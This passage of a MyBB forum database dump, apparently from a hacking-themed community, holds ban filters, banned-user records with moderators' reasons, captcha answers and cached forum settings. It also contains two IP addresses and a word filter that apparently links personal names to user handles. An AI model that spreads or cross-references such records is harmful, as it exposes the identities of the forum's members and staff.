to Use]'); DROP TABLE IF EXISTS mybb_banfilters; CREATE TABLE mybb_banfilters ( fid int(10) unsigned NOT NULL auto_increment, filter varchar(200) NOT NULL, type int(1) NOT NULL, lastuse bigint(30) NOT NULL, dateline bigint(30) NOT NULL, PRIMARY KEY (fid) ); INSERT INTO mybb_banfilters VALUES('2', 'admin*', '2', '1351779020', '1339730870'); INSERT INTO mybb_banfilters VALUES('28', '*hackforums.net', '3', '1345059593', '1341495238'); INSERT INTO mybb_banfilters VALUES('5', '*fbi.gov', '3', '0', '1339730928'); INSERT INTO mybb_banfilters VALUES('29', '*teleworm.us', '3', '1349440202', '1341495258'); INSERT INTO mybb_banfilters VALUES('7', 'J0k3r', '2', '0', '1339730969'); INSERT INTO mybb_banfilters VALUES('85', '*dick*', '2', '0', '1349745164'); INSERT INTO mybb_banfilters VALUES('9', '*.ru', '3', '0', '1341494791'); INSERT INTO mybb_banfilters VALUES('10', '*myway.com', '3', '0', '1341494800'); INSERT INTO mybb_banfilters VALUES('11', '*mailinator2.com', '3', '0', '1341494814'); INSERT INTO mybb_banfilters VALUES('12', '*sogetthis.com', '3', '0', '1341494843'); INSERT INTO mybb_banfilters VALUES('13', '*mailinator.net', '3', '0', '1341494855'); INSERT INTO mybb_banfilters VALUES('16', '*spamherelots.com', '3', '0', '1341494940'); INSERT INTO mybb_banfilters VALUES('15', '*thisisnotmyrealemail.com', '3', '0', '1341494919'); INSERT INTO mybb_banfilters VALUES('17', '*spambox.us', '3', '0', '1341495003'); INSERT INTO mybb_banfilters VALUES('18', '*NoSpamfor.Us', '3', '0', '1341495021'); INSERT INTO mybb_banfilters VALUES('19', '*guerrillamailblock.com', '3', '0', '1341495035'); INSERT INTO mybb_banfilters VALUES('20', '*jetable.com', '3', '0', '1341495045'); INSERT INTO mybb_banfilters VALUES('21', '*hotmial.com', '3', '0', '1341495055'); INSERT INTO mybb_banfilters VALUES('22', '*hotmai.com', '3', '0', '1341495087'); INSERT INTO mybb_banfilters VALUES('23', '*mintemail.com', '3', '0', '1341495096'); INSERT INTO mybb_banfilters VALUES('24', '*meltmail.com', '3', '0', '1341495105'); INSERT INTO mybb_banfilters VALUES('25', '*sify.com', '3', '0', '1341495112'); INSERT INTO mybb_banfilters VALUES('26', '*binkmail.com', '3', '0', '1341495120'); INSERT INTO mybb_banfilters VALUES('27', '*spamgourmet.com', '3', '0', '1341495131'); INSERT INTO mybb_banfilters VALUES('30', '*rediffmail.com', '3', '0', '1341495380'); INSERT INTO mybb_banfilters VALUES('31', '*spamfree24', '3', '0', '1341495389'); INSERT INTO mybb_banfilters VALUES('32', '*jetable.org', '3', '0', '1341495398'); INSERT INTO mybb_banfilters VALUES('33', '*tempinbox.com', '3', '0', '1341495406'); INSERT INTO mybb_banfilters VALUES('34', '*mailexpire.com', '3', '0', '1341495416'); INSERT INTO mybb_banfilters VALUES('35', '*yopmail.com', '3', '1352555072', '1341495424'); INSERT INTO mybb_banfilters VALUES('36', '*bofthew.com', '3', '0', '1341495433'); INSERT INTO mybb_banfilters VALUES('37', '*safe-mail.net', '3', '0', '1341495481'); INSERT INTO mybb_banfilters VALUES('38', '*trash-mail.com', '3', '0', '1341495489'); INSERT INTO mybb_banfilters VALUES('39', '*spam.la', '3', '0', '1341495496'); INSERT INTO mybb_banfilters VALUES('40', '*mailcatch.com', '3', '0', '1341495504'); INSERT INTO mybb_banfilters VALUES('41', '*goemailgo.com', '3', '0', '1341495522'); INSERT INTO mybb_banfilters VALUES('42', '*thankyou2010.com', '3', '0', '1341495529'); INSERT INTO mybb_banfilters VALUES('43', '*emailthe.net', '3', '0', '1341495538'); INSERT INTO mybb_banfilters VALUES('44', '*gmil.com', '3', '0', '1341495623'); INSERT INTO mybb_banfilters VALUES('45', '*dispostable.com', '3', '0', '1341495656'); INSERT INTO mybb_banfilters VALUES('46', '*anonymbox.com', '3', '0', '1341495664'); INSERT INTO mybb_banfilters VALUES('47', '*lhsdv.com', '3', '0', '1341495671'); INSERT INTO mybb_banfilters VALUES('48', '*gamil.com', '3', '0', '1341495677'); INSERT INTO mybb_banfilters VALUES('49', '*0-mail.com', '3', '0', '1341495685'); INSERT INTO mybb_banfilters VALUES('50', '*makemetheking.com ', '3', '0', '1341495696'); INSERT INTO mybb_banfilters VALUES('51', '*djrabbit.info', '3', '0', '1341495703'); INSERT INTO mybb_banfilters VALUES('52', '*quickinbox.com', '3', '0', '1341495713'); INSERT INTO mybb_banfilters VALUES('53', '*zippymail.info', '3', '1348522369', '1341495721'); INSERT INTO mybb_banfilters VALUES('54', '*mailinator.com', '3', '1352018570', '1341495735'); INSERT INTO mybb_banfilters VALUES('55', '*emeraldwebmail.com', '3', '0', '1341495744'); INSERT INTO mybb_banfilters VALUES('56', '*bobmail.info', '3', '0', '1341495775'); INSERT INTO mybb_banfilters VALUES('57', '*suremail.info', '3', '0', '1341495781'); INSERT INTO mybb_banfilters VALUES('58', '*pjjkp.com', '3', '0', '1341495788'); INSERT INTO mybb_banfilters VALUES('59', '*163.com', '3', '0', '1341495795'); INSERT INTO mybb_banfilters VALUES('60', '*tradermail.info', '3', '0', '1341495802'); INSERT INTO mybb_banfilters VALUES('61', '*hush.ai', '3', '0', '1341495811'); INSERT INTO mybb_banfilters VALUES('62', '*incognitomail.org', '3', '0', '1341495821'); INSERT INTO mybb_banfilters VALUES('63', '*wegwerfemail.de', '3', '0', '1341495830'); INSERT INTO mybb_banfilters VALUES('64', '*safetymail.info', '3', '0', '1341495839'); INSERT INTO mybb_banfilters VALUES('65', '*keepmymail.com', '3', '1352555108', '1341495854'); INSERT INTO mybb_banfilters VALUES('66', '*jnxjn.com', '3', '0', '1341495861'); INSERT INTO mybb_banfilters VALUES('67', '*appspotmail.com', '3', '0', '1341495872'); INSERT INTO mybb_banfilters VALUES('69', '*o2.pl', '3', '1346283062', '1341496691'); INSERT INTO mybb_banfilters VALUES('70', 'dump', '2', '0', '1344011186'); INSERT INTO mybb_banfilters VALUES('71', 'fbi*', '2', '0', '1344011210'); INSERT INTO mybb_banfilters VALUES('72', 'suck*', '2', '1350576598', '1344011226'); INSERT INTO mybb_banfilters VALUES('73', '*.edu', '3', '1351343867', '1344427262'); INSERT INTO mybb_banfilters VALUES('74', '*dumps', '3', '1346898960', '1344427341'); INSERT INTO mybb_banfilters VALUES('75', '*gmx.com', '3', '1349107391', '1345818466'); INSERT INTO mybb_banfilters VALUES('76', 'sell*', '2', '0', '1346768396'); INSERT INTO mybb_banfilters VALUES('77', 'card*', '2', '0', '1346768402'); INSERT INTO mybb_banfilters VALUES('78', 'dumps*', '2', '0', '1346768414'); INSERT INTO mybb_banfilters VALUES('79', '*dumps', '2', '0', '1346768419'); INSERT INTO mybb_banfilters VALUES('80', '*card', '2', '0', '1346768425'); INSERT INTO mybb_banfilters VALUES('81', '*stuff', '2', '0', '1346768444'); INSERT INTO mybb_banfilters VALUES('82', '97.255.20.208', '1', '0', '1349656109'); INSERT INTO mybb_banfilters VALUES('83', '*speed.1s.fr', '3', '1349661663', '1349661576'); INSERT INTO mybb_banfilters VALUES('84', '*jok3r*', '2', '1349739428', '1349735158'); INSERT INTO mybb_banfilters VALUES('86', '*craves*', '2', '0', '1349745189'); INSERT INTO mybb_banfilters VALUES('87', '*rocketmail.com', '3', '0', '1351136092'); INSERT INTO mybb_banfilters VALUES('88', '71.67.179.16', '1', '1352683672', '1352254422'); DROP TABLE IF EXISTS mybb_banned; CREATE TABLE mybb_banned ( uid int(10) unsigned NOT NULL, gid int(10) unsigned NOT NULL, oldgroup int(10) unsigned NOT NULL, oldadditionalgroups text NOT NULL, olddisplaygroup int(11) NOT NULL, admin int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, bantime varchar(50) NOT NULL, lifted bigint(30) NOT NULL, reason varchar(255) NOT NULL, KEY uid (uid), KEY dateline (dateline) ); INSERT INTO mybb_banned VALUES('108', '14', '5', '', '0', '1', '1346768917', '---', '0', 'Multi Accounting (Proof: Time and gmx.com spam email)'); INSERT INTO mybb_banned VALUES('157', '14', '5', '', '0', '1', '1346769145', '---', '0', 'Spammer'); INSERT INTO mybb_banned VALUES('176', '0', '5', '', '0', '1', '1346968852', '---', '0', 'Fake E-Mails'); INSERT INTO mybb_banned VALUES('177', '0', '5', '', '0', '1', '1346968852', '---', '0', 'Fake E-Mails'); INSERT INTO mybb_banned VALUES('179', '0', '5', '', '0', '1', '1347077544', '---', '0', 'Spam Email'); INSERT INTO mybb_banned VALUES('211', '0', '5', '', '0', '1', '1349496249', '---', '0', '20 Minute Mail? Good Bye Spam'); INSERT INTO mybb_banned VALUES('231', '7', '2', '', '0', '1', '1350428750', '0-2-0', '1355007900', 'Take a look here: http://pastebin.com/sftb2X5x'); INSERT INTO mybb_banned VALUES('243', '7', '5', '', '0', '1', '1349734513', '---', '0', 'gujvgrrgt'); INSERT INTO mybb_banned VALUES('203', '7', '2', '18,17,20,13', '0', '61', '1349924553', '0-0-1', '1381460520', 'Threatning to DDoS our site.'); INSERT INTO mybb_banned VALUES('249', '7', '2', '', '0', '1', '1350093593', '0-2-0', '1355367540', 'Kicked out of AF but still active on AF? Very legit.'); INSERT INTO mybb_banned VALUES('254', '14', '9', '17', '17', '1', '1351630198', '---', '0', 'Scammers are not welcome.'); INSERT INTO mybb_banned VALUES('266', '7', '2', '', '0', '1', '1350450377', '---', '0', 'Oh Off course you can talk to my staff by taking their Skype IDs and not PMing them also offering them to leave LH and go on AF.'); INSERT INTO mybb_banned VALUES('251', '14', '2', '', '0', '1', '1350525399', '---', '0', 'Sorry but you are not welcome to LH due to security reasons.'); INSERT INTO mybb_banned VALUES('224', '14', '2', '', '0', '1', '1350760616', '---', '0', 'Thanks for the offer. Bye.'); INSERT INTO mybb_banned VALUES('214', '14', '2', '17', '2', '1', '1351038873', '---', '0', 'Leeching.'); INSERT INTO mybb_banned VALUES('302', '14', '2', '', '0', '1', '1352253808', '---', '0', 'Leechers not allowed + Multi Accounting '); INSERT INTO mybb_banned VALUES('328', '14', '2', '', '0', '1', '1352258991', '---', '0', 'Multi Accounting. Do not come back!'); DROP TABLE IF EXISTS mybb_calendarpermissions; CREATE TABLE mybb_calendarpermissions ( cid int(10) unsigned NOT NULL, gid int(10) unsigned NOT NULL, canviewcalendar int(1) NOT NULL, canaddevents int(1) NOT NULL, canbypasseventmod int(1) NOT NULL, canmoderateevents int(1) NOT NULL ); DROP TABLE IF EXISTS mybb_calendars; CREATE TABLE mybb_calendars ( cid int(10) unsigned NOT NULL auto_increment, name varchar(100) NOT NULL, disporder int(10) unsigned NOT NULL, startofweek int(1) NOT NULL, showbirthdays int(1) NOT NULL, eventlimit int(3) NOT NULL, moderation int(1) NOT NULL, allowhtml int(1) NOT NULL, allowmycode int(1) NOT NULL, allowimgcode int(1) NOT NULL, allowvideocode int(1) NOT NULL, allowsmilies int(1) NOT NULL, PRIMARY KEY (cid) ); DROP TABLE IF EXISTS mybb_captcha; CREATE TABLE mybb_captcha ( imagehash varchar(32) NOT NULL, imagestring varchar(8) NOT NULL, dateline bigint(30) NOT NULL, KEY imagehash (imagehash), KEY dateline (dateline) ); INSERT INTO mybb_captcha VALUES('46e9c0b159f2f9b8f62b6c29457b9eb2', 'fh5eQ', '1352178613'); INSERT INTO mybb_captcha VALUES('c66dfed8645b389313371446b8de3809', 'nY8Ul', '1352431678'); INSERT INTO mybb_captcha VALUES('5a4359aa96e02d1fd9a521bf08aa78d9', 'rjord', '1352304397'); INSERT INTO mybb_captcha VALUES('499f902c2d9e509bfc209ba186a342fc', 'DDQji', '1352324682'); INSERT INTO mybb_captcha VALUES('07702d84b9a8ffb3681bc290e130f555', 'DBdz7', '1352519243'); INSERT INTO mybb_captcha VALUES('f9756e797546204085ecf1635f1b64e3', 'vvP74', '1352646498'); INSERT INTO mybb_captcha VALUES('1d29fde03dc5a9f6e5b8a13bd1729ae2', 'VYpCh', '1352649130'); INSERT INTO mybb_captcha VALUES('eaaa807ec33738be21973f20e127c70f', 'UJDJJ', '1352659899'); INSERT INTO mybb_captcha VALUES('d13dc06aba080a268d7b9ffbb10c759f', 'jQaQA', '1352211538'); INSERT INTO mybb_captcha VALUES('6e777ae3b4133eade1a06d4abdb5bd1b', '8k7UC', '1352149912'); INSERT INTO mybb_captcha VALUES('7191a9c376d222094ca82482782c5ade', 'XiKIV', '1352352624'); INSERT INTO mybb_captcha VALUES('9d66a56f0f60a5cb1cf01c1d6c938609', 'Tkx3t', '1352625792'); INSERT INTO mybb_captcha VALUES('b5e830993125edb5947731d3d6d583e9', 'qOOze', '1352180534'); INSERT INTO mybb_captcha VALUES('60aab6ca41ba746da43f6421a849737e', 'Fbukv', '1352214759'); INSERT INTO mybb_captcha VALUES('a8a77b94721ffee30b99d85f50134878', 'bcwhF', '1352226096'); INSERT INTO mybb_captcha VALUES('7b2cf227cead64e78f00cf3337752622', 'qM6Ay', '1352253382'); INSERT INTO mybb_captcha VALUES('2141050bf74ec88ac631d6460c983094', '38sxV', '1352296719'); INSERT INTO mybb_captcha VALUES('5b74bb792abb854a6a96adc4ec58d9a1', 'hiRBk', '1352442655'); INSERT INTO mybb_captcha VALUES('dae86cb7d80e14bfb8c521b4cfe2e861', 'VXtyX', '1352522800'); INSERT INTO mybb_captcha VALUES('d5d43a23d972c359c3c61f6a98a205b9', 'M4DgU', '1352522801'); INSERT INTO mybb_captcha VALUES('9f9fe9770d8777c04b8c91715d756928', '7CAI4', '1352528992'); INSERT INTO mybb_captcha VALUES('88841b3b9c3e6fe6c398d9e7c3c499ae', 'LCPb8', '1352554421'); INSERT INTO mybb_captcha VALUES('ef2c08bb6abfadd65868e45a4a3c1f17', 'jJuVH', '1352597518'); INSERT INTO mybb_captcha VALUES('40bc75e2c66374948bbca2b27c6227b8', 'tRwqA', '1352665648'); DROP TABLE IF EXISTS mybb_datacache; CREATE TABLE mybb_datacache ( title varchar(50) NOT NULL, cache mediumtext NOT NULL, PRIMARY KEY (title) ); INSERT INTO mybb_datacache VALUES('version', 'a:2:{s:7:\"version\";s:5:\"1.6.8\";s:12:\"version_code\";i:1608;}'); INSERT INTO mybb_datacache VALUES('attachtypes', 'a:20:{s:3:\"zip\";a:6:{s:4:\"atid\";s:1:\"1\";s:4:\"name\";s:8:\"ZIP File\";s:8:\"mimetype\";s:15:\"application/zip\";s:9:\"extension\";s:3:\"zip\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/zip.gif\";}s:3:\"jpg\";a:6:{s:4:\"atid\";s:1:\"2\";s:4:\"name\";s:9:\"JPG Image\";s:8:\"mimetype\";s:10:\"image/jpeg\";s:9:\"extension\";s:3:\"jpg\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"txt\";a:6:{s:4:\"atid\";s:1:\"3\";s:4:\"name\";s:13:\"Text Document\";s:8:\"mimetype\";s:10:\"text/plain\";s:9:\"extension\";s:3:\"txt\";s:7:\"maxsize\";s:3:\"200\";s:4:\"icon\";s:26:\"images/attachtypes/txt.gif\";}s:3:\"gif\";a:6:{s:4:\"atid\";s:1:\"4\";s:4:\"name\";s:9:\"GIF Image\";s:8:\"mimetype\";s:9:\"image/gif\";s:9:\"extension\";s:3:\"gif\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"php\";a:6:{s:4:\"atid\";s:1:\"6\";s:4:\"name\";s:8:\"PHP File\";s:8:\"mimetype\";s:23:\"application/x-httpd-php\";s:9:\"extension\";s:3:\"php\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:26:\"images/attachtypes/php.gif\";}s:3:\"png\";a:6:{s:4:\"atid\";s:1:\"7\";s:4:\"name\";s:9:\"PNG Image\";s:8:\"mimetype\";s:9:\"image/png\";s:9:\"extension\";s:3:\"png\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"doc\";a:6:{s:4:\"atid\";s:1:\"8\";s:4:\"name\";s:23:\"Microsoft Word Document\";s:8:\"mimetype\";s:18:\"application/msword\";s:9:\"extension\";s:3:\"doc\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/doc.gif\";}s:3:\"htm\";a:6:{s:4:\"atid\";s:1:\"9\";s:4:\"name\";s:8:\"HTM File\";s:8:\"mimetype\";s:9:\"text/html\";s:9:\"extension\";s:3:\"htm\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:27:\"images/attachtypes/html.gif\";}s:4:\"html\";a:6:{s:4:\"atid\";s:2:\"10\";s:4:\"name\";s:9:\"HTML File\";s:8:\"mimetype\";s:9:\"text/html\";s:9:\"extension\";s:4:\"html\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:27:\"images/attachtypes/html.gif\";}s:4:\"jpeg\";a:6:{s:4:\"atid\";s:2:\"11\";s:4:\"name\";s:10:\"JPEG Image\";s:8:\"mimetype\";s:10:\"image/jpeg\";s:9:\"extension\";s:4:\"jpeg\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:2:\"gz\";a:6:{s:4:\"atid\";s:2:\"12\";s:4:\"name\";s:20:\"GZIP Compressed File\";s:8:\"mimetype\";s:18:\"application/x-gzip\";s:9:\"extension\";s:2:\"gz\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/tar.gif\";}s:3:\"tar\";a:6:{s:4:\"atid\";s:2:\"13\";s:4:\"name\";s:19:\"TAR Compressed File\";s:8:\"mimetype\";s:17:\"application/x-tar\";s:9:\"extension\";s:3:\"tar\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/tar.gif\";}s:3:\"css\";a:6:{s:4:\"atid\";s:2:\"14\";s:4:\"name\";s:14:\"CSS Stylesheet\";s:8:\"mimetype\";s:8:\"text/css\";s:9:\"extension\";s:3:\"css\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:26:\"images/attachtypes/css.gif\";}s:3:\"pdf\";a:6:{s:4:\"atid\";s:2:\"15\";s:4:\"name\";s:17:\"Adobe Acrobat PDF\";s:8:\"mimetype\";s:15:\"application/pdf\";s:9:\"extension\";s:3:\"pdf\";s:7:\"maxsize\";s:4:\"2048\";s:4:\"icon\";s:26:\"images/attachtypes/pdf.gif\";}s:3:\"bmp\";a:6:{s:4:\"atid\";s:2:\"16\";s:4:\"name\";s:12:\"Bitmap Image\";s:8:\"mimetype\";s:9:\"image/bmp\";s:9:\"extension\";s:3:\"bmp\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:4:\"docx\";a:6:{s:4:\"atid\";s:2:\"17\";s:4:\"name\";s:28:\"Microsoft Word 2007 Document\";s:8:\"mimetype\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:9:\"extension\";s:4:\"docx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/doc.gif\";}s:3:\"xls\";a:6:{s:4:\"atid\";s:2:\"18\";s:4:\"name\";s:24:\"Microsoft Excel Document\";s:8:\"mimetype\";s:24:\"application/vnd.ms-excel\";s:9:\"extension\";s:3:\"xls\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/xls.gif\";}s:4:\"xlsx\";a:6:{s:4:\"atid\";s:2:\"19\";s:4:\"name\";s:29:\"Microsoft Excel 2007 Document\";s:8:\"mimetype\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:9:\"extension\";s:4:\"xlsx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/xls.gif\";}s:3:\"ppt\";a:6:{s:4:\"atid\";s:2:\"20\";s:4:\"name\";s:29:\"Microsoft PowerPoint Document\";s:8:\"mimetype\";s:29:\"application/vnd.ms-powerpoint\";s:9:\"extension\";s:3:\"ppt\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/ppt.gif\";}s:4:\"pptx\";a:6:{s:4:\"atid\";s:2:\"21\";s:4:\"name\";s:34:\"Microsoft PowerPoint 2007 Document\";s:8:\"mimetype\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:9:\"extension\";s:4:\"pptx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/ppt.gif\";}}'); INSERT INTO mybb_datacache VALUES('smilies', 'a:16:{i:41;a:6:{s:3:\"sid\";s:2:\"41\";s:4:\"name\";s:5:\"Smile\";s:4:\"find\";s:2:\":)\";s:5:\"image\";s:33:\"/images/smilies/Clean/smiling.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:42;a:6:{s:3:\"sid\";s:2:\"42\";s:4:\"name\";s:8:\"Confused\";s:4:\"find\";s:3:\":?:\";s:5:\"image\";s:29:\"/images/smilies/Clean/huh.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:43;a:6:{s:3:\"sid\";s:2:\"43\";s:4:\"name\";s:4:\"Cool\";s:4:\"find\";s:6:\":cool:\";s:5:\"image\";s:30:\"/images/smilies/Clean/cool.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:44;a:6:{s:3:\"sid\";s:2:\"44\";s:4:\"name\";s:9:\"Surprised\";s:4:\"find\";s:2:\":O\";s:5:\"image\";s:35:\"/images/smilies/Clean/surprised.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:45;a:6:{s:3:\"sid\";s:2:\"45\";s:4:\"name\";s:5:\"Angel\";s:4:\"find\";s:7:\":angel:\";s:5:\"image\";s:31:\"/images/smilies/Clean/angel.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:46;a:6:{s:3:\"sid\";s:2:\"46\";s:4:\"name\";s:10:\"Embarrased\";s:4:\"find\";s:12:\":embarrased:\";s:5:\"image\";s:36:\"/images/smilies/Clean/embarrased.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:47;a:6:{s:3:\"sid\";s:2:\"47\";s:4:\"name\";s:4:\"Wink\";s:4:\"find\";s:2:\";)\";s:5:\"image\";s:30:\"/images/smilies/Clean/wink.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:48;a:6:{s:3:\"sid\";s:2:\"48\";s:4:\"name\";s:6:\"Tounge\";s:4:\"find\";s:2:\":P\";s:5:\"image\";s:32:\"/images/smilies/Clean/tounge.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:49;a:6:{s:3:\"sid\";s:2:\"49\";s:4:\"name\";s:3:\"Lub\";s:4:\"find\";s:2:\"<3\";s:5:\"image\";s:29:\"/images/smilies/Clean/lub.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:50;a:6:{s:3:\"sid\";s:2:\"50\";s:4:\"name\";s:4:\"Grin\";s:4:\"find\";s:2:\":D\";s:5:\"image\";s:31:\"/images/smilies/Clean/happy.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:51;a:6:{s:3:\"sid\";s:2:\"51\";s:4:\"name\";s:3:\"Mad\";s:4:\"find\";s:7:\":angry:\";s:5:\"image\";s:29:\"/images/smilies/Clean/mad.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:52;a:6:{s:3:\"sid\";s:2:\"52\";s:4:\"name\";s:3:\"Sad\";s:4:\"find\";s:2:\":(\";s:5:\"image\";s:29:\"/images/smilies/Clean/sad.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:53;a:6:{s:3:\"sid\";s:2:\"53\";s:4:\"name\";s:6:\"Crying\";s:4:\"find\";s:3:\":\'(\";s:5:\"image\";s:32:\"/images/smilies/Clean/crying.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:54;a:6:{s:3:\"sid\";s:2:\"54\";s:4:\"name\";s:5:\"Hehe!\";s:4:\"find\";s:7:\":hehe!:\";s:5:\"image\";s:31:\"/images/smilies/Clean/hehe!.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:39;a:6:{s:3:\"sid\";s:2:\"39\";s:4:\"name\";s:4:\"ROFL\";s:4:\"find\";s:8:\":roflol:\";s:5:\"image\";s:27:\"images/smilies/Clean/24.gif\";s:9:\"disporder\";s:1:\"1\";s:13:\"showclickable\";s:1:\"1\";}i:56;a:6:{s:3:\"sid\";s:2:\"56\";s:4:\"name\";s:5:\"Devil\";s:4:\"find\";s:6:\":evil:\";s:5:\"image\";s:31:\"/images/smilies/Clean/devil.png\";s:9:\"disporder\";s:1:\"2\";s:13:\"showclickable\";s:1:\"1\";}}'); INSERT INTO mybb_datacache VALUES('badwords', 'a:9:{i:1;a:3:{s:3:\"bid\";s:1:\"1\";s:7:\"badword\";s:10:\"hackforums\";s:11:\"replacement\";s:10:\"[censored]\";}i:2;a:3:{s:3:\"bid\";s:1:\"2\";s:7:\"badword\";s:9:\"sharecash\";s:11:\"replacement\";s:10:\"[censored]\";}i:3;a:3:{s:3:\"bid\";s:1:\"3\";s:7:\"badword\";s:8:\"shitcash\";s:11:\"replacement\";s:10:\"[censored]\";}i:7;a:3:{s:3:\"bid\";s:1:\"7\";s:7:\"badword\";s:6:\"hafeez\";s:11:\"replacement\";s:5:\"Jok3r\";}i:8;a:3:{s:3:\"bid\";s:1:\"8\";s:7:\"badword\";s:6:\"kamran\";s:11:\"replacement\";s:3:\"t3h\";}i:10;a:3:{s:3:\"bid\";s:2:\"10\";s:7:\"badword\";s:7:\"wrzhost\";s:11:\"replacement\";s:10:\"[censored]\";}i:11;a:3:{s:3:\"bid\";s:2:\"11\";s:7:\"badword\";s:15:\"l33thacking.com\";s:11:\"replacement\";s:15:\"l33thacking.net\";}i:12;a:3:{s:3:\"bid\";s:2:\"12\";s:7:\"badword\";s:5:\"kamz*\";s:11:\"replacement\";s:16:\"[Word Forbidden]\";}i:14;a:3:{s:3:\"bid\";s:2:\"14\";s:7:\"badword\";s:10:\"*lthackin*\";s:11:\"replacement\";s:18:\"[Forbidden to Use]\";}}'); INSERT INTO mybb_datacache VALUES('usergroups', 'a:17:{i:1;a:73:{s:3:\"gid\";s:1:\"1\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:6:\"Guests\";s:11:\"description\";s:77:\"The default group that all visitors are assigned to unless they\'re logged in.\";s:9:\"namestyle\";s:10:\"{username}\";s:9:\"usertitle\";s:12:\"Unregistered\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"0\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"